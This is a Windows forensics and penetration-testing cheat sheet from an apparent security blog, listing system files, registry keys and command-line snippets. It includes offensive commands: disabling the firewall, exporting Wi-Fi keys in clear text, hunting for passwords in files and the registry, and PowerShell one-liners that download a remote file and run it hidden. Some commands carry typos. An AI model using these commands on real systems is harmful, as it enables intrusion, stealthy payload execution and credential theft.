Win-Fu

This article contains very useful information for Windows systems. In this context:

  • Forensics
  • Network
  • Malware Analysis
  • Penetration Test

you can find information about such areas in this article.

 

Important WINDOWS Files

%SYSTEMROOT%    
Typically C:\Windows

%SYSTEMROOT%\System32\drivers\etc\hosts
DNS entries

%SYSTEMROOT%\System32\drivers\etc\networks
Network settings

%SYSTEMROOT%\system32\config\SAM
User & password hashes

%SYSTEMROOT%\repair\SAM
Backup copy of SAM

%SYSTEMROOT%\system32\config\RegBack\SAM
Backup copy of SAM

%WINDIR%\system32\AppEvent.Evt
Application Log

%WINDIR%\system32\SecEvent.Evt
Security Log

 

Important REGISTRY Files

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU

# Recently opened programs

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

# Latest documents in Office program

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

# Manually entered URLs in Internet Explorer

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

# We can view past activity.

 

WINDOWS NETWORK COMMANDS

ipconfig /all

# Display IP Configuration

ipconfig /displaydns

# Displays the DNS records of domains that we have previously visited

netstat -ano

# List open connections

netstat -anop tcp 1

# Netstat loop

netstat -ani findstr LISTENING

# Displays listening ports

route print

# Display routing table

arp -a

# Show arp table

tftp -I ip GET remotefile

# Download file with TFTP frpm remote PC

netsh wlan show profiles

# Display wireless network profiles, we have previously connected 

netsh firewall set opmode disable

# Disable firewall on system

netsh wlan export profile folder=. key=clear

# Export all wireless network profiles, we have previously connected 

 

WINDOWS SYSTEM COMMANDS

ver

# Get Windows Version

echo %USERNAME%

# Display current username

net user %USERNAME% *

# Change password of active user

findstr /si password^ .txt I *.xmll *.xls

# search "password" word in all files

wmic qfe get

# Display system updates

reg query HKLM /f password /t REG SZ /s

# Search "password" word in Regedit

tasklist /M /FI "PID eq 6976"

# Displays the dll files used by the PID value 6976 process.

tasklist /FI "PID eq 5240"

# Show process with PID value 5240

netstat -ano | findstr "ESTABLISHED"


# Show connections

 

Gathering Information on Wireless Networks

 

netsh wlan show networks mode = bssid

netsh wlan show networks

 

Powershell

download file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/filename','%TEMP%\yenismi');

 run the downloaded file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/filename','%TEMP%\newname');Start-Process "%TEMP%\newname.exe"

run the downloaded file (hidden)

powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/oldname','%TEMP%\newname.exe'); Start-Process "%TEMP%\newname.exe"

 running an application in admin authority

powershell start-process cmd.exe -Verb runAs

 

Besim ALTINOK

Cyber Security Researcher

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir